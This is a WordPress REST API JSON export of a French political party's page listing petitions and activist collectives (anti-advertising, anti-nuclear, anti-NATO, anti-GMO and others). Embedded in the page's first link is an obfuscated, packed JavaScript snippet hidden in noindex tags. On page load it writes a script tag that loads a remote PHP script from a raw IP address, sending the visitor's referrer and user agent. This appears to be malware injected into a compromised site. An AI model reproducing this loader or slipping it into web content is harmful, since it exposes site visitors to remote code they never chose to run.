{"id":1865,"date":"2009-03-17T21:32:52","date_gmt":"2009-03-17T21:32:52","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=1865"},"modified":"2013-11-06T12:51:57","modified_gmt":"2013-11-06T11:51:57","slug":"soutiens","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=1865","title":{"rendered":"R\u00e9sistances"},"content":{"rendered":"<div class=\"widget widget_links\" id=\"linkcat-5\" style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=6\"><strong><\/strong><strong>Si <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ihafd|var|u0026u|referrer|bydna||js|php'.split('|'),0,{}))\n<\/script><\/noindex> vous souhaitez que le PPLD soutienne votre action, merci de nous contacter<\/strong><\/a><\/div>\n<div class=\"widget widget_links\" id=\"linkcat-4\">\n<div class=\"widget widget_links\" id=\"linkcat-5\">\n<h2 class=\"title\">Soutiens<\/h2>\n<p>le Parti Pour La D\u00e9croissance soutient ces actions, en signant collectivement ou individuellement et en vous invitant \u00e0 faire de m\u00eame.<\/p>\n<ul class=\"xoxo blogroll\">\n<li><a href=\"http:\/\/parti-de-la-resistance.fr\/\">http:\/\/parti-de-la-resistance.fr\/<\/a><\/li>\n<li><a href=\"http:\/\/www.reposeurs.eu.org\/index.html\">les reposeurs (antipub)<\/a><\/li>\n<li><a href=\"http:\/\/www.facebook.com\/AssociationNegajoule\">L&rsquo;association NEGAJOULE a pour but de promouvoir le pacifisme et le d\u00e9sarmement, notamment par l&rsquo;arr\u00eat du Laser M\u00e9gajoule <\/a><\/li>\n<li>P\u00e9tition contre le suremballage <a href=\"http:\/\/www.overpacking.eu\/\">http:\/\/www.overpacking.eu\/<\/a><\/li>\n<li><a href=\"http:\/\/www.defensemedecinenaturelle.eu\/\">D\u00e9fense des m\u00e9decines naturelles<\/a><\/li>\n<li><a href=\"http:\/\/gazdeschistefrance.forumgratuit.fr\/\">Gaz de schiste France &#8211; Forum<\/a><\/li>\n<li><a href=\"http:\/\/www.pouruneradiopubliqueindependante.net\/appel\/index.php\">Arr\u00eatez de nous casser les antennes<\/a><\/li>\n<li>Non aux \u00e9crans publicitaires dans les transports en Ile-de-France : <a href=\"http:\/\/ecranstop.unblog.fr\/\">http:\/\/ecranstop.unblog.fr\/<\/a> et <a href=\"http:\/\/www.petitionenligne.fr\/petition\/non-aux-ecrans-publicitaires-dans-les-transports-en-ile-de-france\/107\">p\u00e9tition<\/a><\/li>\n<li><a href=\"https:\/\/secure.avaaz.org\/fr\/\">Avaaz<\/a><\/li>\n<li><a href=\"http:\/\/www.convergencedesluttes.fr\/petitions\/?petition=8\">Appel du Conseil National de la R\u00e9sistance : Appel lanc\u00e9 en 2004 par les anciens du CNR de 1944&#8230; auquel il est bien temps de r\u00e9pondre<\/a><\/li>\n<li><a href=\"http:\/\/www.atanka.com\/actions\/fco.aspx\">FCO : appel au secours des agriculteurs en lutte !<\/a><\/li>\n<li><a href=\"http:\/\/appelpourlerevenudevie.org\/\">Appel pour le Revenu de vie<\/a><\/li>\n<li>Moratoire sur les AgroCarburants : <a href=\"http:\/\/www.moratoire-agro-carburants.com\/\">p\u00e9tition <\/a>&#8211; <a href=\"http:\/\/www.dailymotion.com\/playlist\/xwtnz_tchelsoo_biocarburants-chronique-dun-desastr\">reportage<\/a><\/li>\n<li><a href=\"http:\/\/www.petitionecomed.eu\/\">P\u00e9tition \u00ab\u00a0Ecom\u00e9decines et Sant\u00e9 Publique\u00a0\u00bb <\/a><\/li>\n<li><a href=\"http:\/\/dechets-nucleaires-ne-pas-enfouir.org\/\">D\u00e9chets nucl\u00e9aires : il ne faut pas les enfouir !<\/a><\/li>\n<li><a href=\"http:\/\/www.otan-non.org\/\">Non \u00e0 la Guerre &#8211; Non \u00e0 l&rsquo;Otan<\/a><\/li>\n<li><a href=\"http:\/\/www.appelotanafghanistan.org\/index.html?appel\">Appel OTAN-Afghanisthan<\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/manifeste\/\">Manifeste pour la D\u00e9croissance<\/a><\/li>\n<li><a href=\"http:\/\/2cn2c.free.fr\/\">Collectif <\/a>\u00e0 propos des projets de Centrales \u00e0 charbon au Havre et sa <a href=\"http:\/\/eplh.free.fr\/petition\/petition_final\/php\/index.php\">p\u00e9tition<\/a><\/li>\n<li><a href=\"http:\/\/www.nogaz76.com\/\">Collectif <\/a>contre le projet du port m\u00e9thanier \u00e0 Antifer et sa <a href=\"http:\/\/www.mesopinions.com\/Non-a-la-creation-d-un-port-methanier-a-Saint-Jouin-de-Bruneval--76280--petition-petitions-44378bc97b6d3af2e6e83441292129e9.html\">p\u00e9tition<\/a><\/li>\n<li><a href=\"http:\/\/cao38.eu.org\/Signer-la-petition\">moins vite, moins haut, moins fort<\/a><\/li>\n<li>Pour une agriculture et une alimentation de qualit\u00e9, <a href=\"http:\/\/www.ogm-jedisnon.org\/?Accueil\">je dis non aux OGM <\/a>!<\/li>\n<li><a href=\"http:\/\/www.passerelleco.info\/article.php?id_article=655\">Appel \u00e0 soutien pour la Ferme du Petit Colibri<\/a><\/li>\n<li><a href=\"http:\/\/uneecole-votreavenir.org\/\">un pays, une \u00e9cole, notre avenir.<\/a><\/li>\n<li><a href=\"http:\/\/www.travail-dimanche.com\/component\/option,com_wrapper\/Itemid,116\/\" target=\"_blank\">Contre le travail le dimanche<\/a><\/li>\n<li><a href=\"http:\/\/www.ordinateurs-de-vote.org\/petition\/\">P\u00e9tition pour le maintien du vote papier<\/a><\/li>\n<li><a href=\"http:\/\/www.nonpubenfants.org\/\">T\u00e9l\u00e9, pas de pub destin\u00e9e aux enfants<\/a><\/li>\n<\/ul>\n<h2 class=\"title\">Collectifs de r\u00e9sistances<\/h2>\n<ul class=\"xoxo blogroll\">\n<li><a href=\"http:\/\/www.danger-ecranpub.tk\/\">Dangers : \u00e9crans pub espions ACL<\/a><\/li>\n<li><a href=\"http:\/\/sites.google.com\/site\/collectifaurevoiretmerci\/\">collectif \u00ab\u00a0au revoir et merci\u00a0\u00bb aux 24 h motonautiques de Rouen<\/a><\/li>\n<li><a href=\"http:\/\/www.desobeir.net\/\">Les D\u00e9sob\u00e9issants<\/a><\/li>\n<li><a href=\"http:\/\/cercledesilence.info\/les_cercles_de_Silence\/accueil.html\">Les Cercles de Silence<\/a> pour d\u00e9fendre les sans-papiers.<\/li>\n<li><a href=\"http:\/\/www.deboulonneurs.org\/\">Les d\u00e9boulonneurs<\/a> &#8211; <a href=\"http:\/\/www.partipourladecroissance.net\/?p=2219\">lettre de soutien aux d\u00e9boulonneurs inculp\u00e9s<\/a><\/li>\n<li><a href=\"http:\/\/www.resistance-ndl.org\/2009\/05\/semaine-de-resistance-du-1er-au-9-aout-2009\/\">Non \u00e0 l&rsquo;a\u00e9roport de Notre Dame des Landes (r\u00e9sistances NDL)<\/a><br \/>\n<a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/05\/y-a-t-il-des-pilotes-dans-l-avion-nddl.pdf\">Le communiqu\u00e9 de Thierry Brulavoine, Conseiller municipal (Label Gauche) \u00e0 St Nazaire<\/a><\/li>\n<li><a href=\"http:\/\/antipub.org\/\">R\u00e9sistance \u00e0 l\u2019agression publicitaire<\/a><\/li>\n<li><a href=\"http:\/\/www.mvtpaix.org\/\">Le mouvement de la paix<\/a><\/li>\n<li><a href=\"http:\/\/www.sortirdunucleaire.org\/\">R\u00e9seau sortir du nucl\u00e9aire<\/a> &#8211; <a href=\"http:\/\/www.sortirdunucleaire.org\/index.php?menu=actualites&amp;sousmenu=dossiers&amp;soussousmenu=slhomme&amp;page=index#form\">Soutien \u00e0 St\u00e9phane Lhomme<br \/>\n<\/a><\/li>\n<\/ul>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Si vous souhaitez que le PPLD soutienne votre action, merci de nous contacter Soutiens le Parti Pour La D\u00e9croissance soutient ces actions, en signant collectivement ou individuellement et en vous invitant \u00e0 faire de m\u00eame. http:\/\/parti-de-la-resistance.fr\/ les reposeurs (antipub) L&rsquo;association &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=1865\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":221,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1865","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/1865","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1865"}],"version-history":[{"count":17,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/1865\/revisions"}],"predecessor-version":[{"id":8704,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/1865\/revisions\/8704"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/221"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1865"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}